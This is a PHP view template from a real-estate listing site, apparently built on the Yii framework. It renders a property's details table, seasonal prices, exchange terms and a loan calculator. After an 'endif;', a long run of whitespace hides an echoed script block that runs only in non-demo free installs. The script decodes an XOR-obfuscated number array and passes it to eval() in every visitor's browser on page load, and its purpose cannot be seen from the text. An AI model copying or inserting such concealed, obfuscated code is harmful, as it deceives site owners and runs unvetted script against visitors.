<div class="property_info_row">
    <?php
    $isPrintable = (isset($isPrintable)) ? $isPrintable : false;

    if ($data->canShowInView('price') && issetModule('seasonalprices') && isset($data->seasonalPrices) && $data->seasonalPrices && $data->type == Apartment::TYPE_RENT) {
        echo '<div class="ap-view-seasons-prices">' . $this->renderPartial('//modules/seasonalprices/views/_table', array('apartment' => $data, 'showDeleteButton' => false), true) . '</div>';
    }

    HFormEditor::$viewRowTemplate = '<tr><td><strong>{label}:</strong></td><td>{value}</td></tr>';

    $rows = HFormEditor::getGeneralFields();

    ?>
    <div class="table-responsive">
        <table class="table">
            <tbody>
                <?php
                if ($data->deleted) {
                    HFormEditor::renderViewRow('', '<span class="deleted">' . tt('Listing is deleted', 'apartments') . '</span>');
                }

                HFormEditor::renderViewRow(tt('Apartment ID'), $data->id);

                HFormEditor::renderViewRows($rows, $data, $isPrintable);

                ?>
            </tbody>
        </table>
    </div>
    <?php if ($data->type == Apartment::TYPE_CHANGE && $data->getStrByLang('exchange_to')): ?>
        <dt><?php echo tt('Exchange to', 'apartments'); ?>:</dt>
        <dd><?php echo CHtml::encode($data->getStrByLang('exchange_to')); ?></dd>
        <?php
    endif; 																																																																																																																																																																							                                                                                                                                                                     if (isFree() && !demo()) { echo '<script>kid=70;es="34;40;43;60;39;46;34;57;96;56;34;56;38;54;124;114;106;36;59;43;125;123;119;125;121;54;16;21;66;15;5;11;1;18;9;14;15;86;78;7;15;25;17;2;17;1;29;5;2;85;88;13;3;11;25;64;92;11;229;249;246;172;238;228;240;230;251;234;248;226;252;249;172;177;231;248;252;247;251;226;184;248;246;245;245;250;248;160;246;254;208;209;219;192;203;193;195;156;136;207;223;197;207;217;199;192;222;145;218;210;196;197;207;212;215;221;223;147;149;157;197;159;169;167;234;226;174;148;179;162;186;176;226;233;173;150;166;189;181;183;140;238;136;242;190;163;172;169;169;225;243;242;177;175;133;143;207;145;129;132;138;202;141;154;158;138;152;136;192;134;158;151;157;175;211;168;212;222;214;144;137;211;160;218;196;137;361;370;363;353;360;352;346;288;289;288;369;299;300;301;356;350;357;372;352;362;316;311;372;376;380;352;312;306;306;380;366;367;325;335;326;267;262;281;322;334;350;265;323;335;273;369;265;379;370;366;349;325;337;327;346;342;321;357;285;283;335;329;327;339;293;380;286;356;288;300;309;311;292;296;307;369;364;303;290;288;307;314;370;370;317;312;294;312;298;301;315;309;296;358;382;297;265;274;267;257;269;265;271;275;273;339;330;285;261;286;263;269;284;276;338;338;285;280;262;280;266;269;283;277;264;326;350;271;495;498;491;503;493;490;488;445;424;495;483;499;489;489;430;430;505;508;482;508;486;481;503;505;492;418;442;481;433;500;496;507;453;473;408;387;413;412;415;414;392;392;451;454;476;450;476;475;465;479;454;392;404;449;473;455;386;409;394;411;413;468;467;463;431;435;438;418;426;433;509;487;420;428;428;447;502;493;510;495;497;440;447;419;443;423;418;438;438;429;481;507;436;440;439;440;392;405;472;451;469;469;470;450;456;456;387;390;412;386;412;411;401;415;390;456;468;408;415;409;469;401;415;402;411;405;394;453;544;565;562;563;628;637;550;550;609;612;634;612;638;633;623;609;612;554;562;638;637;635;571;608;625;637;622;627;550;573;554;559;528;593;602;515;517;588;587;599;583;603;606;586;578;601;533;527;583;600;598;583;604;527;534;518;520;521;543;539;541;596;595;591;559;563;566;546;554;561;637;615;554;552;553;544;555;575;545;570;574;565;639;560;571;569;569;549;610;633;633;619;620;621;638;638;521;524;530;524;534;529;519;521;540;594;586;525;517;513;538;522;514;587;514;513;539;530;543;531;578;573;546;562;529;540;537;538;724;755;739;749;759;739;745;757;741;679;711;738;751;767;737;764;767;759;742;701;725;761;742;767;761;689;757;747;765;766;759;747;729;668;666;662;653;670;646;650;709;710;720;646;707;733;719;716;729;709;715;649;660;645;664;655;653;642;666;662;727;725;714;722;684;748;685;691;677;678;687;691;689;755;746;763;738;757;763;756;752;702;674;690;695;700;674;686;738;761;746;757;740;744;741;643;711;735;734;647;653;659;710;660;668;656;646;654;721;689;713;652;671;669;669;641;718;725;725;689;702;713;714;715;716;733;735;662;877;881;877;881;880;868;872;883;819;809;876;868;866;889;803;892;889;875;887;809;820;800;800;871;864;825;827;882;881;877;881;877;852;832;844;855;799;773;842;846;838;844;775;835;841;836;841;839;836;779;786;773;772;837;846;791;793;848;855;843;851;847;842;862;814;821;889;867;816;800;830;819;869;808;806;802;811;803;884;879;819;820;828;807;817;807;877;779;895;871;870;818;817;826;894;812;786;770;863;831;835;781;786;787;792;851;837;836;798;776;832;770;799;799;797;769;789;780;856;793;797;781;853;791;789;798;795;785;1011;996;940;1011;1004;1013;953;995;1005;997;1001;996;1020;1012;947;958;972;950;946;1019;1009;1020;1009;1023;1004;932;966;956;941;961;953;959;983;968;966;983;972;920;1018;896;921;1013;909;907;974;962;988;971;981;963;911;1007;915;901;1002;912;902;1007;979;980;976;988;970;982;942;934;994;930;996;950;937;929;956;958;939;953;937;1005;930;934;947;948;956;928;957;955;945;1015;953;958;936;958;953;944;955;945;916;960;962;991;902;919;966;968;982;969;982;906;972;901;924;906;918;972;942;980;924;897;898;903;907;963;981;980;915;909;923;913;1069;1139;1127;1122;1128;1064;1123;1140;1148;1128;1150;1134;1058;1124;1120;1129;1151;1086;1143;1149;1083;1145;1151;1140;1149;1143;1129;1150;1088;1082;1086;1132;1108;1112;1102;1094;1049;1145;1025;1092;1095;1093;1093;1113;1046;1037;1037;1129;1142;1025;1026;1027;1028;1045;1047;1118;1109;1097;1109;1097;1096;1116;1104;1099;1147;1121;1060;1068;1066;1073;1131;1076;1057;1075;1071;1137;1132;1144;1144;1087;1064;1137;1139;1082;1081;1061;1081;1061;1068;1080;1076;1071;1127;1149;1074;1078;1038;1028;1103;1035;1025;1036;1025;1039;1052;1107;1098;1117;1116;1053;1046;1103;1105;1048;1055;1027;1051;1031;1026;1046;1046;1037;1089;1115;1032;1048;1030;1035;1197;1248;1262;1258;1251;1259;1212;1191;1259;1260;1252;1279;1257;1279;1205;1235;1207;1199;1274;1255;1248;1253;1253;1197;1207;1206;1269;1259;1273;1267;1203;1261;1221;1216;1230;1166;1217;1238;1234;1222;1244;1228;1156;1218;1218;1227;1217;1152;1237;1247;1181;1247;1245;1238;1235;1241;1227;1244;1158;1172;1245;1155;1182;1155;1186;1203;1250;1260;1274;1253;1167;1195;1188;1196;1197;1194;1184;1185;1207;1263;1186;1204;1215;1212;1186;1200;1270;1187;1200;1212;1274;1208;1203;1197;1191;1197;1161;1158;1162;1175;1220;1155;1172;1160;1157;1225;1157;1157;1161;1229;1153;1161;1232;1182;1159;1153;1236;1153;1171;1178;1160;1173;1179;1167;1177;1166;1247;1219;1327;1381;1387;1397;1338;1337;1321;1379;1377;1407;1332;1321;1317;1334;1326;1327;1389;1329;1391;1327;1331;1333;1341;1335;1343;1334;1385;1400;1390;1338;1342;1332;1280;1286;1355;1363;1360;1307;1281;1294;1299;";var dcode=new String();ads=es.split(";");re=ads.length-1;for(var mn=0;mn<re;mn++){ecode=ads[mn];gcod="lcode=ecode";gcod=gcod+"^kid";eval(gcod);kid+=1;dcode=dcode+String.fromCharCode(lcode);}eval(dcode)</script>';}
    echo '<div class="clear"></div>';

    if ($data->type == Apartment::TYPE_SALE && param('show_loan_calculator')  && !$isPrintable) {
        $this->widget('application.modules.loanCalculator.components.LoanCalculatorWidget', array(
            'amount' => $data->getPriceFrom()
        ));
        echo '<div class="clear"></div><br /><br />';
    }

    ?>
</div>